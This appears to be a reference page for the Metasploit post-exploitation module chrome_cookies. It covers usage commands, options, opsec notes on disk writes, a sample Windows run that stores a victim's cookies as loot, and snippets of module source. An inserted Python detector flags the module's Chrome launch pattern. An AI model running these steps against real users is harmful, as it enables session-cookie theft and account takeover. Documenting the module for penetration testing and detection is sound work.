Chrome Gather Cookies - Metasploit
This page contains detailed information about how to use the post/multi/gather/chrome_cookies Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Chrome Gather Cookies
Module: post/multi/gather/chrome_cookies
Source code: modules/post/multi/gather/chrome_cookies.rb
Disclosure date: -
Last modification time: 2019-01-15 07:19:46 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Read all cookies from the Default Chrome profile of the target user.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/multi/gather/chrome_cookies
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/multi/gather/chrome_cookies
msf post(chrome_cookies) > show options
... show and set options ...
msf post(chrome_cookies) > set SESSION session-id
msf post(chrome_cookies) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/multi/gather/chrome_cookies")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Gather Chrome Cookies
Reads all cookies from the Default Chrome Profile on the target machine. Uses Headless Chrome and Chrome's Remote Debugging.
Opsec
Disk writes
This writes randomly-named files to disk temporarily. You may want to consider the tradeoff between getting the user's Chrome cookies and the noisiness of writing to disk.
The module writes an HTML file with a random 10-15 character name to a directory you can specify via WRITABLE_DIR.
Running processes
On non-Windows non-meterpreter sessions, a headless Chrome process will be left running after the module completes. You can find and kill this process manually afterwards.
Vulnerable Application
This module works on Chrome 59 or later on all operating systems. This module has been tested on Windows, Linux, and OSX.
Chrome does not need to be running on the target machine for this module to work.
Verification Steps
- Obtain a session on the target machine
- Do:
use post/multi/gather/chrome_cookies
- Do:
set SESSION <your session ID>
- Do:
run
- The current user's Chrome cookies will be stored as loot
Options
CHROME_BINARY_PATH
The path to the user's Chrome binary. On Linux this defaults to searching for google-chrome in $PATH. On macOS, this defaults to /Applications/Google Chrome.app/Contents/MacOS/Google Chrome. If the module doesn't find any cookies, it may be that a different Chrome binary from the one the user normally uses is being run. In that case, you can change the Chrome binary executed with this option.
WRITABLE_DIR
Directory used to write temporary files.
Two files are written, with random 10-15 character alphanumeric filenames. One is the HTML file loaded by Chrome and the other is where the cookies are saved. Both files are deleted during cleanup.
REMOTE_DEBUGGING_PORT
Port to tell Chrome to expose Remote Debugging on. Default is the normal remote debugging port, 9222.
Scenarios
Windows
Suppose you've got a session on the target machine.
To extract the target user's Chrome cookies:
msf > use post/multi/gather/chrome_cookies
msf post(multi/gather/chrome_cookies) > options
Module options (post/multi/gather/chrome_cookies):
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
CHROME_BINARY_PATH                      no        The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT  9222             no        Port on target machine to use for remote debugging protocol
SESSION                1                yes       The session to run this module on.
WRITEABLE_DIR                           no        Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
msf post(multi/gather/chrome_cookies) > set session
session =>
msf post(multi/gather/chrome_cookies) > run
[*] Determining session platform
[*] Platform: windows
[*] Type: meterpreter
[*] Activated Chrome's Remote Debugging (pid: 9452) via "\Program Files (x86)\Google\Chrome\Application\chrome.exe" --window-position=0,0 --enable-logging --v=1 --disable-translate --disable-extensions --disable-background-networking --safebrowsing-disable-auto-update --disable-sync --metrics-recording-only --disable-default-apps --mute-audio --no-first-run --disable-web-security --disable-plugins --disable-gpu --user-data-dir="\Users\msfdev\AppData\Local\Google\Chrome\User Data" --remote-debugging-port=9222 \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
[+] Found Match
[+] 169 Chrome Cookies stored in /home/msfdev/.msf4/loot/20190108065112_default_172.22.222.200_chrome.gather.co_082863.txt
[*] Removing file \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html
[*] Removing file \Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log
[*] Post module execution completed
msf5 post(multi/gather/chrome_cookies) >
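A defender-side view of the artifacts listed in the Opsec section and visible in the scenario output above, as an added example that is not code from the Metasploit module or its author: the Python below scores process-creation and file-deletion telemetry against the documented pattern (Chrome started with --remote-debugging-port and --disable-web-security, a random 10-15 character .html page loaded from the temp directory, the user's real --user-data-dir, and chrome_debug.log removed afterwards). The sample events are constructed; the Windows command line is the one printed in the scenario output, while the Linux command line, the file-deletion event and the benign launches are assumptions made for illustration.

```python
"""Added example for this page, not code from the Metasploit module or its
authors: flag endpoint telemetry matching the artifacts documented above for
post/multi/gather/chrome_cookies (Chrome started with remote debugging, the
same-origin policy disabled and a random-named .html page from a temp
directory, then chrome_debug.log removed from the profile directory)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample telemetry as (event_type, detail) pairs. The first
# command line is the one printed in this page's Windows scenario output;
# every other event is an assumption made up for this example.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("process", r'"\Program Files (x86)\Google\Chrome\Application\chrome.exe" '
                r'--window-position=0,0 --enable-logging --v=1 --disable-translate '
                r'--disable-extensions --disable-background-networking '
                r'--safebrowsing-disable-auto-update --disable-sync '
                r'--metrics-recording-only --disable-default-apps --mute-audio '
                r'--no-first-run --disable-web-security --disable-plugins --disable-gpu '
                r'--user-data-dir="\Users\msfdev\AppData\Local\Google\Chrome\User Data" '
                r'--remote-debugging-port=9222 '
                r'\Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html'),
    ("file_delete", r"\Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log"),
    # Assumed Linux equivalent (the module's exact Linux flags are not on this page).
    ("process", "google-chrome --headless --disable-web-security "
                "--user-data-dir=/home/dev/.config/google-chrome "
                "--remote-debugging-port=9222 /tmp/aB3dE9fG1hJ2k.html"),
    # Benign (constructed): a developer driving Chrome over the debugging port for UI tests.
    ("process", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" '
                r'--remote-debugging-port=9222 http://localhost:3000'),
    # Benign (constructed): an ordinary interactive launch.
    ("process", r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'),
]

# Chrome binary on Windows (chrome.exe) or Linux (google-chrome), quoted or not.
CHROME_BIN_RE = re.compile(r'(?:^|[\\/ ])(?:chrome(?:\.exe)?|google[ -]chrome)"?(?=\s|$)', re.I)
REMOTE_DEBUG_RE = re.compile(r'--remote-debugging-port=(\d+)')
# The page documents a 10-15 character alphanumeric name written to /tmp or AppData\Local\Temp.
TEMP_HTML_RE = re.compile(r'(?:[\\/]Temp|/tmp)[\\/]([A-Za-z0-9]{10,15})\.html\s*$', re.I)


@dataclass
class Finding:
    severity: str          # "high", "medium" or "low"
    indicators: List[str]
    detail: str


def inspect_process(cmdline: str) -> Optional[Finding]:
    """Score one process command line; None when it is not Chrome or shows nothing of note."""
    if not CHROME_BIN_RE.search(cmdline):
        return None
    indicators: List[str] = []
    port = REMOTE_DEBUG_RE.search(cmdline)
    if port:
        indicators.append(f"remote debugging exposed on port {port.group(1)}")
    web_security_off = "--disable-web-security" in cmdline
    if web_security_off:
        indicators.append("same-origin policy disabled")
    if "--enable-logging" in cmdline and "--v=1" in cmdline:
        indicators.append("verbose logging to chrome_debug.log in the profile directory")
    if "--user-data-dir=" in cmdline:
        indicators.append("explicit --user-data-dir (the user's real profile is reused)")
    page = TEMP_HTML_RE.search(cmdline)
    if page:
        indicators.append(f"random-named HTML page loaded from a temp directory ({page.group(1)}.html)")
    if not indicators:
        return None
    # Remote debugging alone is common developer tooling; the combination with a
    # disabled same-origin policy and a temp-directory page is the pattern to escalate.
    severity = "high" if port and web_security_off and page else "low"
    return Finding(severity, indicators, cmdline[:100])


def scan_events(events: List[Tuple[str, str]]) -> List[Finding]:
    """Run the process check over process events and flag chrome_debug.log deletions."""
    findings: List[Finding] = []
    for kind, detail in events:
        if kind == "process":
            finding = inspect_process(detail)
            if finding:
                findings.append(finding)
        elif kind == "file_delete" and detail.lower().endswith("chrome_debug.log"):
            findings.append(Finding("medium", ["chrome_debug.log removed from the Chrome profile directory"], detail))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.detail}")
        for indicator in f.indicators:
            print(f"    - {indicator}")
```

Remote debugging on its own is ordinary developer tooling, so the scoring only escalates to high when it coincides with a disabled same-origin policy and a temp-directory page; in real telemetry you would also join the process event with the later chrome_debug.log deletion from the same user and profile directory, which the page shows the module performing during cleanup.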
Future features
Profiles
This module only extracts cookies from the default Chrome profile. The target may have multiple, and you may wish to extract cookies from all of them. This would require enumerating and extracting the profiles by name. Example code to extract cookies from a non-default Chrome profile can be found at https://github.com/defaultnamehere/cookie_crimes.
See also
See https://github.com/defaultnamehere/cookie_crimes for more information and manual instructions for Windows.
See https://mango.pdf.zone/stealing-chrome-cookies-without-a-password for the blog post in which this technique was first published.
Msfconsole Usage
Here is how the multi/gather/chrome_cookies post exploitation module looks in the msfconsole:
msf6 > use post/multi/gather/chrome_cookies
msf6 post(multi/gather/chrome_cookies) > show info
Name: Chrome Gather Cookies
Module: post/multi/gather/chrome_cookies
Platform: Linux, Unix, BSD, OSX, Windows
Arch:
Rank: Normal
Provided by:
mangopdf <mangodotpdf[at]gmail.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
CHROME_BINARY_PATH                      no        The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT  9222             no        Port on target machine to use for remote debugging protocol
SESSION                                 yes       The session to run this module on.
WRITEABLE_DIR                           no        Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
Description:
Read all cookies from the Default Chrome profile of the target user.
Module Options
This is a complete list of options available in the multi/gather/chrome_cookies post exploitation module:
msf6 post(multi/gather/chrome_cookies) > show options
Module options (post/multi/gather/chrome_cookies):
Name                   Current Setting  Required  Description
----                   ---------------  --------  -----------
CHROME_BINARY_PATH                      no        The path to the user's Chrome binary (leave blank to use the default for the OS)
REMOTE_DEBUGGING_PORT  9222             no        Port on target machine to use for remote debugging protocol
SESSION                                 yes       The session to run this module on.
WRITEABLE_DIR                           no        Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\Local\Temp)
Advanced Options
Here is a complete list of advanced options supported by the multi/gather/chrome_cookies post exploitation module:
msf6 post(multi/gather/chrome_cookies) > show advanced
Module advanced options (post/multi/gather/chrome_cookies):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
VERBOSE    false            no        Enable detailed status messages
WORKSPACE                   no        Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the multi/gather/chrome_cookies module can do:
msf6 post(multi/gather/chrome_cookies) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the multi/gather/chrome_cookies post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(multi/gather/chrome_cookies) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Unsupported platform: <SESSION.PLATFORM>
Here is a relevant code snippet related to the "Unsupported platform: <SESSION.PLATFORM>" error message:
      chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'
      user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"
      temp_storage_dir = temp_storage_dir.nil? ? "\\Users\\#{username}\\AppData\\Local\\Temp" : temp_storage_dir
      @cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"
    else
      fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"
    end

    unless datastore['CHROME_BINARY_PATH'].empty?
      chrome = datastore['CHROME_BINARY_PATH']
    end
<TEMP_STORAGE_DIR> is not writable
Here is a relevant code snippet related to the "<TEMP_STORAGE_DIR> is not writable" error message:
    end

=begin
    # #writable? not supported on windows
    unless writable? @temp_storage_dir
      fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"
    end
=end

    @html_storage_path = create_cookie_stealing_html(temp_storage_dir)

Failed to retrieve cookie data
Here is a relevant code snippet related to the "Failed to retrieve cookie data" error message:
          print_good('Found Match')
          cookies_msg = line
        end
      }

      fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?

      # Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info
      cookies_json = cookies_msg.split("REMOTE_DEBUGGING|")[1]
      cookies_json.split('", source: file')[0]
    end
No session found, giving up
Here is a relevant code snippet related to the "No session found, giving up" error message:
      loot = store_loot ltype, ctype, session, data, nil, msg
      print_good "#{msg} stored in #{loot}"
    end

    def run
      fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?

      # Issues with write_file. Maybe a path problem?
      if session.platform == 'windows' && session.type == 'shell'
        fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
      end
Windows shell session not support, giving up
Here is a relevant code snippet related to the "Windows shell session not support, giving up" error message:
    def run
      fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?

      # Issues with write_file. Maybe a path problem?
      if session.platform == 'windows' && session.type == 'shell'
        fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
      end

      unless session.platform == 'windows' && session.type == 'meterpreter'
        print_warning 'This module will leave a headless Chrome process running on the target machine.'
      end
This module will leave a headless Chrome process running on the target machine.
Here is a relevant code snippet related to the "This module will leave a headless Chrome process running on the target machine." error message:
      if session.platform == 'windows' && session.type == 'shell'
        fail_with Failure::BadConfig, 'Windows shell session not support, giving up'
      end

      unless session.platform == 'windows' && session.type == 'meterpreter'
        print_warning 'This module will leave a headless Chrome process running on the target machine.'
      end

      configure_for_platform
      cookies = get_cookies
      cookies_parsed = JSON.parse cookies
Related Pull Requests
- #11245 Merged Pull Request: Update documentation for post/multi/gather/chrome_cookies
- #11052 Merged Pull Request: Gather chrome cookies post module
See Also
Check also the following modules related to this module:
- post/multi/gather/apple_ios_backup
- post/multi/gather/aws_ec2_instance_metadata
- post/multi/gather/aws_keys
- post/multi/gather/check_malware
- post/multi/gather/dbvis_enum
- post/multi/gather/dns_bruteforce
- post/multi/gather/dns_reverse_lookup
- post/multi/gather/dns_srv_lookup
- post/multi/gather/docker_creds
- post/multi/gather/enum_hexchat
- post/multi/gather/enum_software_versions
- post/multi/gather/enum_vbox
- post/multi/gather/env
- post/multi/gather/fetchmailrc_creds
- post/multi/gather/filezilla_client_cred
- post/multi/gather/find_vmx
- post/multi/gather/firefox_creds
- post/multi/gather/gpg_creds
- post/multi/gather/grub_creds
- post/multi/gather/irssi_creds
- post/multi/gather/jboss_gather
- post/multi/gather/jenkins_gather
- post/multi/gather/lastpass_creds
- post/multi/gather/maven_creds
- post/multi/gather/multi_command
- post/multi/gather/netrc_creds
- post/multi/gather/pgpass_creds
- post/multi/gather/pidgin_cred
- post/multi/gather/ping_sweep
- post/multi/gather/remmina_creds
- post/multi/gather/resolve_hosts
- post/multi/gather/rsyncd_creds
- post/multi/gather/rubygems_api_key
- post/multi/gather/run_console_rc_file
- post/multi/gather/saltstack_salt
- post/multi/gather/skype_enum
- post/multi/gather/ssh_creds
- post/multi/gather/thunderbird_creds
- post/multi/gather/tomcat_gather
- post/multi/gather/ubiquiti_unifi_backup
- post/multi/gather/unix_cached_ad_hashes
- post/multi/gather/unix_kerberos_tickets
- post/multi/gather/wlan_geolocate
Authors
- mangopdf <mangodotpdf[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.